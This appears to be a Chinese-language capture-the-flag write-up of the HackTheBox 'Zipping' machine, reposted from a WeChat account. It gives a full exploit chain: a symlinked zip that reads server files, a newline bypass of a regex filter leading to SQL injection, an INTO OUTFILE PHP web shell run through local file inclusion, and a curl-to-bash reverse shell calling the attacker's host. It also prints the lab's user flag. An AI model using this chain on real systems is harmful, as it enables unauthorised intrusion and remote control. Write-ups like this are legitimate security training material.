先生成恶意的pdf,然后使用burpsuite抓包,抓取product.php内容
ln -s /var/www/html/shop/product.php lol.pdf
zip --symlink lol.zip lol.pdf
product.php代码
// Check to make sure the id parameter is specified in the URL
if (isset($_GET['id'])) {
$id = $_GET['id'];
// Filtering user input for letters or special characters
if(preg_match("/^.*[A-Za-z!#$%^&*()-_=+{}[]\|;:'",.<>/?]|[^0-9]$/", $id, $match)) {
header('Location: index.php');
} else {
// Prepare statement and execute, but does not prevent SQL injection
$stmt = $pdo->prepare("SELECT * FROM products WHERE id = '$id'");
$stmt->execute();
// Fetch the product from the database and return the result as an Array
$product = $stmt->fetch(PDO::FETCH_ASSOC);
// Check if the product exists (array is not empty)
if (!$product) {
// Simple error to display if the id for the product doesn't exists (array is empty)
exit('Product does not exist!');
}
}
} else {
// Simple error to display if the id wasn't specified
exit('No ID provided!');
}
'Zipping | Product') =template_header(
<div class="product content-wrapper">
<img src="assets/imgs/<?=$product['img']?>" width="500" height="500" alt="<?=$product['name']?>">
<div>
<h1 class="name"><?=$product['name']?></h1>
<span class="price">
$<?=$product['price']?>
<?php if ($product['rrp'] > 0): ?>
<span class="rrp">$<?=$product['rrp']?></span>
<?php endif; ?>
</span>
<form action="index.php?page=cart" method="post">
<input type="number" name="quantity" value="1" min="1" max="<?=$product['quantity']?>" placeholder="Quantity" required>
<input type="hidden" name="product_id" value="<?=$product['id']?>">
<input type="submit" value="Add To Cart">
</form>
<div class="description">
<?=$product['desc']?>
</div>
</div>
</div>
<?=template_footer()?>
代码里面的注释说明了sql语句易受sql注入攻击,可以使用换行符绕过regex检查,因为/^.[A-Za-z!#$%^&()-_=+{}[]\|;:'“,.<>/?]只检查第一行(用换行符绕过=%0A) [^0-9]$/检查有效负载是否以数字结尾(绕过#1=%231)
编写文件并通过LFI执行,先生成一个shell文件,然后开启python服务器,等待反弹
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'" > rev.sh
python3 -m http.server 80
nc -lvnp 4444
curl -s $'http://zipping.htb/shop/index.php?page=product&id=%0A'%3bselect+'<%3fphp+system("curl+http%3a//10.10.14.22/rev.sh|bash")%3b%3f>'+into+outfile+'/var/lib/mysql/breached.php'+%231'
curl -s $'http://zipping.htb/shop/index.php?page=..%2f..%2f..%2f..%2f..%2fvar%2flib%2fmysql%2fbreached'
成功拿到user flag:c41c61d3d2252776ca84fd7d1a29b466
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.229] 36748
bash: cannot set terminal process group (1125): Inappropriate ioctl for device
bash: no job control in this shell
rektsu@zipping:/var/www/html/shop$ id
id
uid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)
rektsu@zipping:/var/www/html/shop$ data
data
bash: data: command not found
rektsu@zipping:/var/www/html/shop$ time
time
real 0m0.000s
user 0m0.000s
sys 0m0.000s
rektsu@zipping:/var/www/html/shop$ data
data
bash: data: command not found
rektsu@zipping:/var/www/html/shop$ cat /home/rektsu/user.txt
cat /home/rektsu/user.txt
c41c61d3d2252776ca84fd7d1a29b466
rektsu@zipping:/var/www/html/shop$
原文始发于微信公众号(hades zorejt):HTB-Zipping笔记-新get shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论